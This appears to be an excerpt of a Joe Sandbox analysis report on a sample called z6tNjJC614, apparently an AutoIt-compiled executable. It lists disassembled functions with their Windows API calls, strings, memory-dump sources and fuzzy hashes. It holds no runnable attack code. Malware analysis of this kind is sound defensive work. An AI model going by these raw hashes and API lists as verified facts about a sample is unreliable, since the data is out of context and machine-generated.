                                                                      • Opcode Fuzzy Hash: c312e0f1161cad49fa401590363e0ebec18f2e1f2cc42ebfedc24ef2152c26e4
                                                                      • Instruction Fuzzy Hash: BAC125B1608305AFD700EF64C88492ABBE9FF89348F40495DF98AEB251DB71ED05CB52
                                                                      Function 005677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • _memset.LIBCMT ref: 0056786B
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005678A0
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005678BC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005678D8
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00567902
                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0056792A
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00567935
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0056793A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 1411258926-22481851
                                                                      • Opcode ID: 4eef4cba9b40bf40b5c4cf4e5abe3ecffc7241e8f51b004fd4ab76f445b3d99d
                                                                      • Instruction ID: fd32cc4dea3eef4f8eb7189d4e5c2a22b3ff62d50adc24edc20d1120b9f7098e
                                                                      • Opcode Fuzzy Hash: 4eef4cba9b40bf40b5c4cf4e5abe3ecffc7241e8f51b004fd4ab76f445b3d99d
                                                                      • Instruction Fuzzy Hash: 2B410872C1462DAADF11EBA4DC99DEDBBB8FF58714F00442AF805A3161EB305D44CB90
                                                                      Function 00590E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: b15c3ac467510dcc5937a8f5a9a13fe990b30709e40dcd3d861d143cf3b053f8
                                                                      • Instruction ID: e2816690e0e2251f909d3fd368262138ced0523f54d9b6741e4dc4f5e36fa8e2
                                                                      • Opcode Fuzzy Hash: b15c3ac467510dcc5937a8f5a9a13fe990b30709e40dcd3d861d143cf3b053f8
                                                                      • Instruction Fuzzy Hash: 16412C3110034A8FDF14EF50E8A9AEE3FA4BF55340F152859FC565B2D2DB349A5ACB60
                                                                      Function 0056F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0054E2A0,00000010,?,Bad directive syntax error,0059F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0056F7C2
                                                                      • LoadStringW.USER32(00000000,?,0054E2A0,00000010), ref: 0056F7C9
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • _wprintf.LIBCMT ref: 0056F7FC
                                                                      • __swprintf.LIBCMT ref: 0056F81E
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0056F88D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 1506413516-4153970271
                                                                      • Opcode ID: fee67be27c2bf6d9059d63d18a603a75a16316fb0bcc90c57808eb45ceee8e8a
                                                                      • Instruction ID: 88b7ba5887c75ae45b1d0b0b6897d9dd4e84f52f1645fbb1fea783c9225a669f
                                                                      • Opcode Fuzzy Hash: fee67be27c2bf6d9059d63d18a603a75a16316fb0bcc90c57808eb45ceee8e8a
                                                                      • Instruction Fuzzy Hash: F8216F3290421EEFDF11EF90CC0AEFE7B79BF18300F04086AF505660A1EA319A58DB51
                                                                      Function 005752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                        • Part of subcall function 00517924: _memmove.LIBCMT ref: 005179AD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00575330
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00575346
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00575357
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00575369
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0057537A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_memmove
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2279737902-1007645807
                                                                      • Opcode ID: 9756b3d1dc79b699e7e7f0a1718d66f61e8dbd269ae7e40781d1845c6404238b
                                                                      • Instruction ID: 271052e4f8e0b1aaf122f84d27adbc331b41477ecc4d932b07d691cec1948f8d
                                                                      • Opcode Fuzzy Hash: 9756b3d1dc79b699e7e7f0a1718d66f61e8dbd269ae7e40781d1845c6404238b
                                                                      • Instruction Fuzzy Hash: 3611632195012E7DE720BAB5DC49EFF6EBCFBD5B44F0008197415920E1FEA00D84C5A0
                                                                      Function 005746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 208665112-3771769585
                                                                      • Opcode ID: ad0463bc77b0a74ff21d1bbf8ca672e9607da49f79217c42631c041a1088d6bc
                                                                      • Instruction ID: b4adb6d5ce2c32f617eb375c9c005f7ad8b0d16852b89365d4fc10024fa224b6
                                                                      • Opcode Fuzzy Hash: ad0463bc77b0a74ff21d1bbf8ca672e9607da49f79217c42631c041a1088d6bc
                                                                      • Instruction Fuzzy Hash: B511D5316001156FCB24AB70AC4AEEA7FBCFB52711F0445B6F449D60A1EF719986AB50
                                                                      Function 00574F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00574F7A
                                                                        • Part of subcall function 0053049F: timeGetTime.WINMM(?,75A4B400,00520E7B), ref: 005304A3
                                                                      • Sleep.KERNEL32(0000000A), ref: 00574FA6
                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00574FCA
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00574FEC
                                                                      • SetActiveWindow.USER32 ref: 0057500B
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00575019
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00575038
                                                                      • Sleep.KERNEL32(000000FA), ref: 00575043
                                                                      • IsWindow.USER32 ref: 0057504F
                                                                      • EndDialog.USER32(00000000), ref: 00575060
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 4327b9c868cc84353c61affc99c1ea4a011c438aa355213b9b8b972aeb61fbbc
                                                                      • Instruction ID: 52e89078353864943458b006b19e23ef91352d3646b8ae7e928c347c529f51ad
                                                                      • Opcode Fuzzy Hash: 4327b9c868cc84353c61affc99c1ea4a011c438aa355213b9b8b972aeb61fbbc
                                                                      • Instruction Fuzzy Hash: 6921BE74202601AFE7205F20FC88A263F69FB64345B45502BF00AC12B5EB658D5CFB61
                                                                      Function 0057D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • CoInitialize.OLE32(00000000), ref: 0057D5EA
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0057D67D
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0057D691
                                                                      • CoCreateInstance.OLE32(005A2D7C,00000000,00000001,005C8C1C,?), ref: 0057D6DD
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0057D74C
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 0057D7A4
                                                                      • _memset.LIBCMT ref: 0057D7E1
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0057D81D
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0057D840
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0057D847
                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0057D87E
                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0057D880
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                      • String ID:
                                                                      • API String ID: 1246142700-0
                                                                      • Opcode ID: 393939ac7e1e12b21b1a3b5e1be32e6fc34321172c0712a4adb2bd3b3b108cc8
                                                                      • Instruction ID: aa57cb360e4d786a98174f8c0d1cf1cb1a23be78820fd914cf373abf6c47aa87
                                                                      • Opcode Fuzzy Hash: 393939ac7e1e12b21b1a3b5e1be32e6fc34321172c0712a4adb2bd3b3b108cc8
                                                                      • Instruction Fuzzy Hash: 02B1FD75A00109AFDB04DFA4D898DAEBBB9FF88314F148469F909EB261DB30ED45DB50
                                                                      Function 0056C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 0056C283
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0056C295
                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0056C2F3
                                                                      • GetDlgItem.USER32(?,00000002), ref: 0056C2FE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0056C310
                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0056C364
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0056C372
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0056C383
                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0056C3C6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0056C3D4
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0056C3F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0056C3FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 29b5d7a0111c91da82a1342023320dbcc113b55f8abc5a6dcd68ee25f1b4f591
                                                                      • Instruction ID: 08c4c4098f9accd75bdfe266ece9cef68db0a6390bdf7044bd34795fffbf2a55
                                                                      • Opcode Fuzzy Hash: 29b5d7a0111c91da82a1342023320dbcc113b55f8abc5a6dcd68ee25f1b4f591
                                                                      • Instruction Fuzzy Hash: E3515D71B00205AFDB18CFA9DD99AAEBBBAFB98310F14852DF515D7290D7709D448B10
                                                                      Function 0051201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00511B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512036,?,00000000,?,?,?,?,005116CB,00000000,?), ref: 00511B9A
                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005120D3
                                                                      • KillTimer.USER32(-00000001,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0051216E
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0054BCA6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0054BCD7
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0054BCEE
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0054BD0A
                                                                      • DeleteObject.GDI32(00000000), ref: 0054BD1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 00a1c15aef203ca2f22bfba153bc493b87c80e25a20a0c9b0db7a0e20f9e4ad1
                                                                      • Instruction ID: e3d6026f41076dacb790ed507bed07de4c47bff01dae2ea3c58944c08487ad7b
                                                                      • Opcode Fuzzy Hash: 00a1c15aef203ca2f22bfba153bc493b87c80e25a20a0c9b0db7a0e20f9e4ad1
                                                                      • Instruction Fuzzy Hash: 0F619E30502A01DFEB359F14D94CBA97FF1FF64316F20492AE1428AA70D775ACA4EB50
                                                                      Function 005121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 005125DB: GetWindowLongW.USER32(?,000000EB), ref: 005125EC
                                                                      • GetSysColor.USER32(0000000F), ref: 005121D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 8742a5ee5e913e13e619faceb1b6af0fc8393ef73fdbe03fbd4a85a8f3e5b0a5
                                                                      • Instruction ID: 2add01b6b7bc3fafed86b6d145fda348025c62023748e2c8890bf9ce6a66b861
                                                                      • Opcode Fuzzy Hash: 8742a5ee5e913e13e619faceb1b6af0fc8393ef73fdbe03fbd4a85a8f3e5b0a5
                                                                      • Instruction Fuzzy Hash: 9441B135100140ABEB215F28DC88BFD3F65FB56331F294266FE658A1E1C7318C96EB61
                                                                      Function 0057A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,0059F910), ref: 0057A90B
                                                                      • GetDriveTypeW.KERNEL32(00000061,005C89A0,00000061), ref: 0057A9D5
                                                                      • _wcscpy.LIBCMT ref: 0057A9FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2820617543-1000479233
                                                                      • Opcode ID: 62f54001015fa08e881b0e058dabc2cd58caab2735b4c536a3e0b32e4c40dd9f
                                                                      • Instruction ID: 70f40be1dfe149b7381cf87a621ffbd83ccab8523b676e5141b9718359b0c705
                                                                      • Opcode Fuzzy Hash: 62f54001015fa08e881b0e058dabc2cd58caab2735b4c536a3e0b32e4c40dd9f
                                                                      • Instruction Fuzzy Hash: 96518B311083029BD704EF14E89AAAEBFA5BFC4304F14882DF599572A2DB319949DB53
                                                                      Function 00519837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __i64tow__itow__swprintf
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 421087845-2263619337
                                                                      • Opcode ID: 98cbd5840c8481836e231c126f7d51cd660b0e39f2e6497325652c7f8479ea45
                                                                      • Instruction ID: cb4f99d76b1ae2dc652ffb54cad2797cd992013439ee586389bc5b5315929d5d
                                                                      • Opcode Fuzzy Hash: 98cbd5840c8481836e231c126f7d51cd660b0e39f2e6497325652c7f8479ea45
                                                                      • Instruction Fuzzy Hash: BE41D671500206AFEB24DF78D856EFABFE8FF45304F20486EE549D7291EA319981CB10
                                                                      Function 00597152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0059716A
                                                                      • CreateMenu.USER32 ref: 00597185
                                                                      • SetMenu.USER32(?,00000000), ref: 00597194
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597221
                                                                      • IsMenu.USER32(?), ref: 00597237
                                                                      • CreatePopupMenu.USER32 ref: 00597241
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0059726E
                                                                      • DrawMenuBar.USER32 ref: 00597276
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                      • String ID: 0$F
                                                                      • API String ID: 176399719-3044882817
                                                                      • Opcode ID: 796140ba84e2dcea557b6570c95c0ed6ab997e76c60b94721d5035ab1861fa83
                                                                      • Instruction ID: a737239789b58514fa711f026aaac1d3fe64c0056ee1c1ca232a2cb5e52a95bf
                                                                      • Opcode Fuzzy Hash: 796140ba84e2dcea557b6570c95c0ed6ab997e76c60b94721d5035ab1861fa83
                                                                      • Instruction Fuzzy Hash: 4A414778A11209EFDF20DFA4D984EDA7BB9FF59310F15002AF905A7361D731A914DB90
                                                                      Function 005974BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0059755E
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00597565
                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00597578
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00597580
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0059758B
                                                                      • DeleteDC.GDI32(00000000), ref: 00597594
